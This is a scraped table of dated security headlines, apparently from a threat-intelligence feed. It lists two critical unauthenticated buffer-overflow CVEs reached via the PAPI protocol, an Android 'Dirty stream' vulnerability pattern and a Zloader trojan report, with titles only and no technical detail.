||
|
3.5.24 |
CVE |
(CVSS score: 9.8) - Unauthenticated Buffer Overflow Vulnerability in the Utility Daemon Accessed via the PAPI Protocol |
||
|
3.5.24 |
CVE |
(CVSS score: 9.8) - Unauthenticated Buffer Overflow Vulnerability in the L2/L3 Management Service Accessed via the PAPI Protocol |
||
|
3.5.24 |
Vulnerebility |
“Dirty stream” attack: Discovering and mitigating a common vulnerability pattern in Android apps |
||
|
1.5.24 |
Trojan |
Zloader Learns Old Tricks |
||
|
|
|
|
|
|